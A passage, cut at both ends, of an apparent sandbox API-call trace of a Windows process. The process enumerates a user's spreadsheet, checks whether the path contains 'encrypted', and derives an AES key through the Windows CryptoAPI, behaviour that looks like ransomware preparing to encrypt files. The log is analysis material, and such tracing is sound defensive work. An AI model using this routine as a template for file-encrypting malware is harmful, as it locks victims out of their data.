ftCreationTime.dwLowDateTime=0x33f24930, ftCreationTime.dwHighDateTime=0x1d577da, ftLastAccessTime.dwLowDateTime=0x228bf7c0, ftLastAccessTime.dwHighDateTime=0x1d5a79d, ftLastWriteTime.dwLowDateTime=0x228bf7c0, ftLastWriteTime.dwHighDateTime=0x1d5a79d, nFileSizeHigh=0x0, nFileSizeLow=0x61b4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="3xhPX7.xlsx", cAlternateFileName="3XHPX7~1.XLS")) returned 0x7c20c0 [0032.580] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.580] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.580] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33f24930, ftCreationTime.dwHighDateTime=0x1d577da, ftLastAccessTime.dwLowDateTime=0x228bf7c0, ftLastAccessTime.dwHighDateTime=0x1d5a79d, ftLastWriteTime.dwLowDateTime=0x228bf7c0, ftLastWriteTime.dwHighDateTime=0x1d5a79d, nFileSizeHigh=0x0, nFileSizeLow=0x61b4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="3xhPX7.xlsx", cAlternateFileName="3XHPX7~1.XLS")) returned 0x7c20c0 [0032.580] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.580] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xhPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hPX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PX7.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.581] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.581] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0032.582] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.582] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.582] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.582] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.582] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.582] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.582] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.582] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33f24930, ftCreationTime.dwHighDateTime=0x1d577da, ftLastAccessTime.dwLowDateTime=0x228bf7c0, ftLastAccessTime.dwHighDateTime=0x1d5a79d, ftLastWriteTime.dwLowDateTime=0x228bf7c0, ftLastWriteTime.dwHighDateTime=0x1d5a79d, nFileSizeHigh=0x0, nFileSizeLow=0x61b4, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="3xhPX7.xlsx", cAlternateFileName="3XHPX7~1.XLS")) returned 0x7c2100 [0032.582] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.582] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.582] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.582] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.582] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0032.582] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.582] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0032.583] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.583] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.583] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0032.583] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.583] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.583] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.583] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.583] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.583] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0032.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.583] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0032.584] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.584] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.584] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0032.584] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.584] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.584] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.584] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.584] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.584] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.584] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.584] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.584] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.584] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.584] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.584] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.584] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0032.584] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.584] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.585] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.585] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.585] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.585] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.585] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.585] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.585] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.585] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.585] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.585] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.585] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.585] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.585] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.585] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.585] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.585] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.585] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.585] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0032.585] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.585] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0032.585] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.585] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.585] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0032.586] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.586] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.586] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.586] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.586] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.586] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0032.586] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.586] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0032.586] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.586] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.586] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.586] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0032.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.586] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.586] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.586] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0032.586] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.586] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0032.586] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 